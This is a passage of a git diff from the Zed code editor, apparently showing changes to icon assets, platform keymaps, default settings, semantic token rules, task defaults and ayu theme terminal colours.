b/assets/icons/stop.svg @@ -1,3 +1,3 @@ - + diff --git a/assets/icons/thread.svg b/assets/icons/thread.svg index 496cf42e3a3ee1439f36b8e2479d05564362e628..569a6f3aec7e3b8742d3d7d23fe11db5aea199ba 100644 --- a/assets/icons/thread.svg +++ b/assets/icons/thread.svg @@ -1,3 +1,4 @@ - + + diff --git a/assets/icons/threads_sidebar_left_closed.svg b/assets/icons/threads_sidebar_left_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..feb1015254635ef65f90f2c9ea38efab74d01d60 --- /dev/null +++ b/assets/icons/threads_sidebar_left_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_left_open.svg 
b/assets/icons/threads_sidebar_left_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..8057b060a84d7d7ffcf29aff1c0c79a8764edc22 --- /dev/null +++ b/assets/icons/threads_sidebar_left_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_closed.svg b/assets/icons/threads_sidebar_right_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..10fa4b792fd65b5875dcf2cadab1fc12a123ab47 --- /dev/null +++ b/assets/icons/threads_sidebar_right_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_open.svg b/assets/icons/threads_sidebar_right_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..23a01eb3f82a5866157220172c868ed9ded46033 --- /dev/null +++ b/assets/icons/threads_sidebar_right_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/workspace_nav_closed.svg b/assets/icons/workspace_nav_closed.svg deleted file mode 100644 index ed1fce52d6826a4d10299f331358ff84e4caa973..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_closed.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/icons/workspace_nav_open.svg b/assets/icons/workspace_nav_open.svg deleted file mode 100644 index 464b6aac73c2aeaa9463a805aabc4559377bbfd3..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_open.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index cb5cef24c50f9f9ac637f3ac70adb24d37e56d61..9e7e483e9d8ce245fa34bad55073a59ffe77759a 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -31,7 +31,6 @@ "ctrl-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": 
"debugger::Start", @@ -226,8 +225,8 @@ "context": "ContextEditor > Editor", "bindings": { "ctrl-enter": "assistant::Assist", - "ctrl-s": "workspace::Save", "save": "workspace::Save", + "ctrl-s": "workspace::Save", "ctrl-<": "assistant::InsertIntoEditor", "shift-enter": "assistant::Split", "ctrl-r": "assistant::CycleMessageRole", @@ -258,7 +257,7 @@ "ctrl-shift-j": "agent::ToggleNavigationMenu", "ctrl-alt-i": "agent::ToggleOptionsMenu", "ctrl-alt-shift-n": "agent::ToggleNewThreadMenu", - "ctrl-alt-shift-t": "agent::ToggleStartThreadInSelector", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl->": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", @@ -391,6 +390,14 @@ "ctrl-enter": "search::ReplaceAll", }, }, + { + "context": "BufferSearchBar && !in_replace > Editor", + "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, { "context": "BufferSearchBar && !in_replace > Editor", "bindings": { @@ -424,6 +431,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "bindings": { @@ -624,6 +637,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -670,13 +684,17 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", - "left": "agents_sidebar::CollapseSelectedEntry", - "right": "agents_sidebar::ExpandSelectedEntry", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": 
"menu::SelectChild", "enter": "menu::Confirm", + "space": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", }, }, { @@ -766,18 +784,14 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -895,6 +909,8 @@ "ctrl-alt-c": "project_panel::CopyPath", "alt-shift-copy": "workspace::CopyRelativePath", "alt-ctrl-shift-c": "workspace::CopyRelativePath", + "undo": "project_panel::Undo", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -1232,6 +1248,8 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", }, }, { @@ -1320,6 +1338,15 @@ "ctrl-shift-backspace": "git::DeleteWorktree", }, }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", + } + }, { "context": "SettingsWindow", "use_key_equivalents": true, @@ -1437,8 +1464,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + 
"alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 08fb63868be875f41f6c461354b46f1081a2026f..8c7acbf6b48c924d13e381e2fb08ad3641ed483e 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -39,7 +39,6 @@ "cmd-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "cmd--": ["zed::DecreaseBufferFontSize", { "persist": false }], "cmd-0": ["zed::ResetBufferFontSize", { "persist": false }], - "cmd-,": "zed::OpenSettings", "cmd-alt-,": "zed::OpenSettingsFile", "cmd-q": "zed::Quit", "cmd-h": "zed::Hide", @@ -297,7 +296,7 @@ "cmd-shift-j": "agent::ToggleNavigationMenu", "cmd-alt-m": "agent::ToggleOptionsMenu", "cmd-alt-shift-n": "agent::ToggleNewThreadMenu", - "cmd-alt-shift-t": "agent::ToggleStartThreadInSelector", + "cmd-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "cmd->": "agent::AddSelectionToThread", "cmd-shift-e": "project_panel::ToggleFocus", @@ -446,6 +445,13 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -473,7 +479,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -487,6 +492,12 @@ "cmd-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -691,6 +702,7 @@ "cmd-shift-t": "pane::ReopenClosedItem", "cmd-k cmd-s": 
"zed::OpenKeymap", "cmd-k cmd-t": "theme_selector::Toggle", + "cmd-k cmd-shift-t": "theme::ToggleMode", "ctrl-alt-cmd-p": "settings_profile_selector::Toggle", "cmd-t": "project_symbols::Toggle", "cmd-p": "file_finder::Toggle", @@ -738,13 +750,17 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "cmd-n": "multi_workspace::NewWorkspaceInWindow", - "left": "agents_sidebar::CollapseSelectedEntry", - "right": "agents_sidebar::ExpandSelectedEntry", + "cmd-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", "enter": "menu::Confirm", + "space": "menu::Confirm", + "cmd-f": "agents_sidebar::FocusSidebarFilter", + "cmd-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", }, }, { @@ -830,18 +846,14 @@ "context": "Editor && edit_prediction", "bindings": { "alt-tab": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", - "use_key_equivalents": true, + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", - "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -956,6 +968,7 @@ "cmd-v": "project_panel::Paste", "cmd-alt-c": "workspace::CopyPath", "alt-cmd-shift-c": "workspace::CopyRelativePath", + "cmd-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -1338,6 +1351,8 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "cmd-up": "markdown::ScrollToTop", + "cmd-down": 
"markdown::ScrollToBottom", }, }, { @@ -1425,6 +1440,15 @@ "cmd-shift-backspace": "git::DeleteWorktree", }, }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "cmd-,": "zed::OpenSettings", + } + }, { "context": "SettingsWindow", "use_key_equivalents": true, @@ -1515,8 +1539,8 @@ { "context": "GitPicker", "bindings": { - "cmd-1": "git_picker::ActivateBranchesTab", - "cmd-2": "git_picker::ActivateWorktreesTab", + "cmd-1": "git_picker::ActivateWorktreesTab", + "cmd-2": "git_picker::ActivateBranchesTab", "cmd-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 600025e2069978f3020afb5cb978d05a53317682..92dff9743c3fdfcabab9e217cfbfd39b3f07f75a 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -30,7 +30,6 @@ "ctrl-shift-=": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -259,7 +258,7 @@ "shift-alt-j": "agent::ToggleNavigationMenu", "shift-alt-i": "agent::ToggleOptionsMenu", "ctrl-shift-alt-n": "agent::ToggleNewThreadMenu", - "ctrl-shift-alt-t": "agent::ToggleStartThreadInSelector", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl-shift-.": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", @@ -398,6 +397,13 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", 
"bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -415,7 +421,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -429,6 +434,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -616,6 +627,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -674,13 +686,17 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", - "left": "agents_sidebar::CollapseSelectedEntry", - "right": "agents_sidebar::ExpandSelectedEntry", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", "enter": "menu::Confirm", + "space": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", }, }, { @@ -762,19 +778,15 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "use_key_equivalents": true, "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": 
"editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -893,6 +905,7 @@ "ctrl-v": "project_panel::Paste", "shift-alt-c": "project_panel::CopyPath", "ctrl-k ctrl-shift-c": "workspace::CopyRelativePath", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -1261,6 +1274,8 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", }, }, { @@ -1341,6 +1356,15 @@ "ctrl-shift-backspace": "git::DeleteWorktree", }, }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", + } + }, { "context": "SettingsWindow", "use_key_equivalents": true, @@ -1430,8 +1454,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/macos/jetbrains.json b/assets/keymaps/macos/jetbrains.json index 8612e07c4719dfdbf67762c89505cc2da0cfa000..304ffb86e8c2fd08fb756b015490f8c4ac424f58 100644 --- a/assets/keymaps/macos/jetbrains.json +++ b/assets/keymaps/macos/jetbrains.json @@ -33,6 +33,7 @@ "cmd-+": "editor::UnfoldLines", "alt-shift-g": "editor::SplitSelectionIntoLines", "ctrl-g": ["editor::SelectNext", { "replace_newest": false }], + "ctrl-shift-g": "editor::UndoSelection", "ctrl-cmd-g": ["editor::SelectPrevious", { "replace_newest": false }], "cmd-/": ["editor::ToggleComments", { "advance_downwards": true }], "alt-up": 
"editor::SelectLargerSyntaxNode", diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 1f2742f982bc2165181a797e577b350f5630def9..6d1a0cf278d5eb7598ed92e91b7d4ffad90d9c05 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -427,6 +427,7 @@ "escape": "vim::SwitchToHelixNormalMode", "i": "vim::HelixInsert", "a": "vim::HelixAppend", + "shift-a": "vim::HelixInsertEndOfLine", "ctrl-[": "editor::Cancel", }, }, @@ -510,8 +511,8 @@ "g shift-u": "git::UnstageAndNext", // Zed specific // Window mode - "space w v": "pane::SplitDown", - "space w s": "pane::SplitRight", + "space w v": "pane::SplitRight", + "space w s": "pane::SplitDown", "space w h": "workspace::ActivatePaneLeft", "space w j": "workspace::ActivatePaneDown", "space w k": "workspace::ActivatePaneUp", @@ -1059,7 +1060,7 @@ }, }, { - "context": "Editor && edit_prediction", + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "bindings": { // This is identical to the binding in the base keymap, but the vim bindings above to // "vim::Tab" shadow it, so it needs to be bound again. @@ -1072,15 +1073,7 @@ "enter": "agent::Chat", }, }, - { - "context": "os != macos && Editor && edit_prediction_conflict", - "bindings": { - // alt-l is provided as an alternative to tab/alt-tab. and will be displayed in the UI. This - // is because alt-tab may not be available, as it is often used for window switching on Linux - // and Windows. 
- "alt-l": "editor::AcceptEditPrediction", - }, - }, + { "context": "SettingsWindow > NavigationMenu && !search", "bindings": { @@ -1099,6 +1092,8 @@ "ctrl-d": "markdown::ScrollPageDown", "ctrl-y": "markdown::ScrollUp", "ctrl-e": "markdown::ScrollDown", + "g g": "markdown::ScrollToTop", + "shift-g": "markdown::ScrollToBottom", }, }, { @@ -1118,4 +1113,31 @@ "k": "notebook::NotebookMoveUp", }, }, + { + "context": "ThreadsSidebar && !Editor", + "bindings": { + "j": "menu::SelectNext", + "k": "menu::SelectPrevious", + "h": "menu::SelectParent", + "l": "menu::SelectChild", + "g g": "menu::SelectFirst", + "shift-g": "menu::SelectLast", + "/": "agents_sidebar::FocusSidebarFilter", + "z a": "editor::ToggleFold", + "z c": "menu::SelectParent", + "z o": "menu::SelectChild", + "z shift-m": "editor::FoldAll", + "z shift-r": "editor::UnfoldAll", + }, + }, + { + "context": "ThreadsSidebar > Editor && VimControl && vim_mode == normal", + "bindings": { + "j": "editor::MoveDown", + "k": "editor::MoveUp", + "/": "vim::SwitchToInsertMode", + "escape": "menu::Cancel", + "enter": "editor::Newline", + }, + }, ] diff --git a/assets/settings/default.json b/assets/settings/default.json index 0a824bbe93a0d68a23d934a63eb1fdab1e2f1b02..05d9b592979f19184f6e1b9b9cd6c7b02c603ca1 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -460,12 +460,10 @@ "show_sign_in": true, // Whether to show the menus in the titlebar. "show_menus": false, + // The layout of window control buttons in the title bar (Linux only). + "button_layout": "platform_default", }, "audio": { - // Opt into the new audio system. - "experimental.rodio_audio": false, - // Requires 'rodio_audio: true' - // // Automatically increase or decrease you microphone's volume. This affects how // loud you sound to others. // @@ -474,33 +472,10 @@ // audio and has auto speaker volume on this will make you very loud // compared to other speakers. 
"experimental.auto_microphone_volume": false, - // Requires 'rodio_audio: true' - // - // Automatically increate or decrease the volume of other call members. - // This only affects how things sound for you. - "experimental.auto_speaker_volume": true, - // Requires 'rodio_audio: true' - // - // Remove background noises. Works great for typing, cars, dogs, AC. Does - // not work well on music. - "experimental.denoise": true, - // Requires 'rodio_audio: true' - // - // Use audio parameters compatible with the previous versions of - // experimental audio and non-experimental audio. When this is false you - // will sound strange to anyone not on the latest experimental audio. In - // the future we will migrate by setting this to false - // - // You need to rejoin a call for this setting to apply - "experimental.legacy_audio_compatible": true, - // Requires 'rodio_audio: true' - // // Select specific output audio device. // `null` means use system default. // Any unrecognized output device will fall back to system default. "experimental.output_audio_device": null, - // Requires 'rodio_audio: true' - // // Select specific input audio device. // `null` means use system default. // Any unrecognized input device will fall back to system default. @@ -768,6 +743,9 @@ // 5. Never show the scrollbar: // "never" "show": null, + // Whether to allow horizontal scrolling in the project panel. + // When false, the view is locked to the leftmost position and long file names are clipped. + "horizontal_scroll": true, }, // Which files containing diagnostic errors/warnings to mark in the project panel. // This setting can take the following three values: @@ -895,6 +873,14 @@ // Choices: label_color, icon // Default: icon "status_style": "icon", + // Whether to show file icons in the git panel. + // + // Default: false + "file_icons": false, + // Whether to show folder icons or chevrons for directories in the git panel. 
+ // + // Default: true + "folder_icons": true, // What branch name to use if `init.defaultBranch` is not set // // Default: main @@ -911,6 +897,14 @@ /// /// Default: false "tree_view": false, + // Whether the git panel should open on startup. + // + // Default: false + "starts_open": false, + // Whether to show a badge on the git panel icon with the count of uncommitted changes. + // + // Default: false + "show_count_badge": false, "scrollbar": { // When to show the scrollbar in the git panel. // @@ -920,8 +914,8 @@ }, // Whether to show the addition/deletion change count next to each file in the Git panel. // - // Default: false - "diff_stats": false, + // Default: true + "diff_stats": true, }, "message_editor": { // Whether to automatically replace emoji shortcodes with emoji characters. @@ -935,6 +929,8 @@ "dock": "right", // Default width of the notification panel. "default_width": 380, + // Whether to show a badge on the notification panel icon with the count of unread notifications. + "show_count_badge": false, }, "agent": { // Whether the inline assistant should use streaming tools, when available @@ -1052,6 +1048,7 @@ "spawn_agent": true, "terminal": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1071,6 +1068,7 @@ "grep": true, "spawn_agent": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1080,6 +1078,10 @@ "tools": {}, }, }, + // Whether to start a new thread in the current local project or in a new Git worktree. + // + // Default: local_project + "new_thread_location": "local_project", // Where to show notifications when the agent has either completed // its response, or else needs confirmation before it can run a // tool action. @@ -1282,6 +1284,8 @@ // * "indexed": Use only the files Zed had indexed // * "smart": Be smart and search for ignored when called from a gitignored worktree "include_ignored": "smart", + // Whether to include text channels in file finder results. 
+ "include_channels": false, }, // Whether or not to remove any trailing whitespace from lines of a buffer // before saving it. @@ -1850,6 +1854,8 @@ // Timeout for hover and Cmd-click path hyperlink discovery in milliseconds. Specifying a // timeout of `0` will disable path hyperlinking in terminal. "path_hyperlink_timeout_ms": 1, + // Whether to show a badge on the terminal panel icon with the count of open terminals. + "show_count_badge": false, }, "code_actions_on_format": {}, // Settings related to running tasks. @@ -2143,7 +2149,7 @@ }, }, "Starlark": { - "language_servers": ["starpls", "!buck2-lsp", "..."], + "language_servers": ["starpls", "!buck2-lsp", "!tilt", "..."], }, "Svelte": { "language_servers": ["svelte-language-server", "..."], @@ -2214,6 +2220,9 @@ "api_url": "https://api.openai.com/v1", }, "openai_compatible": {}, + "opencode": { + "api_url": "https://opencode.ai/zen", + }, "open_router": { "api_url": "https://openrouter.ai/api/v1", }, diff --git a/assets/settings/default_semantic_token_rules.json b/assets/settings/default_semantic_token_rules.json index 65b20a7423aef3c3221f9f80e345fd503627d98d..c070a253d3065feff6647123b5f687e94f5e85d6 100644 --- a/assets/settings/default_semantic_token_rules.json +++ b/assets/settings/default_semantic_token_rules.json @@ -119,6 +119,16 @@ "style": ["type"], }, // References + { + "token_type": "parameter", + "token_modifiers": ["declaration"], + "style": ["variable.parameter"] + }, + { + "token_type": "parameter", + "token_modifiers": ["definition"], + "style": ["variable.parameter"] + }, { "token_type": "parameter", "token_modifiers": [], @@ -201,6 +211,11 @@ "token_modifiers": [], "style": ["comment"], }, + { + "token_type": "string", + "token_modifiers": ["documentation"], + "style": ["string.doc"], + }, { "token_type": "string", "token_modifiers": [], diff --git a/assets/settings/initial_tasks.json b/assets/settings/initial_tasks.json index 
5bedafbd3a1e75a755598e37cd673742e146fdcc..0d6f4471320e443f3c4a483f53f6901c76e7dc72 100644 --- a/assets/settings/initial_tasks.json +++ b/assets/settings/initial_tasks.json @@ -48,6 +48,11 @@ "show_summary": true, // Whether to show the command line in the output of the spawned task, defaults to `true`. "show_command": true, + // Which edited buffers to save before running the task: + // * `all` — save all edited buffers + // * `current` — save current buffer only + // * `none` — don't save any buffers + "save": "all", // Represents the tags for inline runnable indicators, or spawning multiple tasks at once. // "tags": [] }, diff --git a/assets/themes/ayu/ayu.json b/assets/themes/ayu/ayu.json index e2b7c3c91fca46ab0e4064719bea5c8793faaccc..3450e35bf62d780bdaf0cff2c6bc9f8bdfea7c1e 100644 --- a/assets/themes/ayu/ayu.json +++ b/assets/themes/ayu/ayu.json @@ -71,31 +71,31 @@ "terminal.background": "#0d1016ff", "terminal.foreground": "#bfbdb6ff", "terminal.bright_foreground": "#bfbdb6ff", - "terminal.dim_foreground": "#0d1016ff", + "terminal.dim_foreground": "#85847fff", "terminal.ansi.black": "#0d1016ff", "terminal.ansi.bright_black": "#545557ff", - "terminal.ansi.dim_black": "#bfbdb6ff", + "terminal.ansi.dim_black": "#3a3b3cff", "terminal.ansi.red": "#ef7177ff", "terminal.ansi.bright_red": "#83353bff", - "terminal.ansi.dim_red": "#febab9ff", + "terminal.ansi.dim_red": "#a74f53ff", "terminal.ansi.green": "#aad84cff", "terminal.ansi.bright_green": "#567627ff", - "terminal.ansi.dim_green": "#d8eca8ff", + "terminal.ansi.dim_green": "#769735ff", "terminal.ansi.yellow": "#feb454ff", "terminal.ansi.bright_yellow": "#92582bff", - "terminal.ansi.dim_yellow": "#ffd9aaff", + "terminal.ansi.dim_yellow": "#b17d3aff", "terminal.ansi.blue": "#5ac1feff", "terminal.ansi.bright_blue": "#27618cff", - "terminal.ansi.dim_blue": "#b7dffeff", + "terminal.ansi.dim_blue": "#3e87b1ff", "terminal.ansi.magenta": "#39bae5ff", "terminal.ansi.bright_magenta": "#205a78ff", - 
"terminal.ansi.dim_magenta": "#addcf3ff", + "terminal.ansi.dim_magenta": "#2782a0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#bfbdb6ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#787876ff", + "terminal.ansi.dim_white": "#85847fff", "link_text.hover": "#5ac1feff", "conflict": "#feb454ff", "conflict.background": "#572815ff", @@ -855,31 +855,31 @@ "terminal.background": "#242835ff", "terminal.foreground": "#cccac2ff", "terminal.bright_foreground": "#cccac2ff", - "terminal.dim_foreground": "#242835ff", + "terminal.dim_foreground": "#8e8d87ff", "terminal.ansi.black": "#242835ff", "terminal.ansi.bright_black": "#67696eff", - "terminal.ansi.dim_black": "#cccac2ff", + "terminal.ansi.dim_black": "#48494dff", "terminal.ansi.red": "#f18779ff", "terminal.ansi.bright_red": "#833f3cff", - "terminal.ansi.dim_red": "#fec4baff", + "terminal.ansi.dim_red": "#a85e54ff", "terminal.ansi.green": "#d5fe80ff", "terminal.ansi.bright_green": "#75993cff", - "terminal.ansi.dim_green": "#ecffc1ff", + "terminal.ansi.dim_green": "#95b159ff", "terminal.ansi.yellow": "#fecf72ff", "terminal.ansi.bright_yellow": "#937237ff", - "terminal.ansi.dim_yellow": "#ffe7b9ff", + "terminal.ansi.dim_yellow": "#b1904fff", "terminal.ansi.blue": "#72cffeff", "terminal.ansi.bright_blue": "#336d8dff", - "terminal.ansi.dim_blue": "#c1e7ffff", + "terminal.ansi.dim_blue": "#4f90b1ff", "terminal.ansi.magenta": "#5bcde5ff", "terminal.ansi.bright_magenta": "#2b6c7bff", - "terminal.ansi.dim_magenta": "#b7e7f2ff", + "terminal.ansi.dim_magenta": "#3f8fa0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#cccac2ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#898a8aff", + 
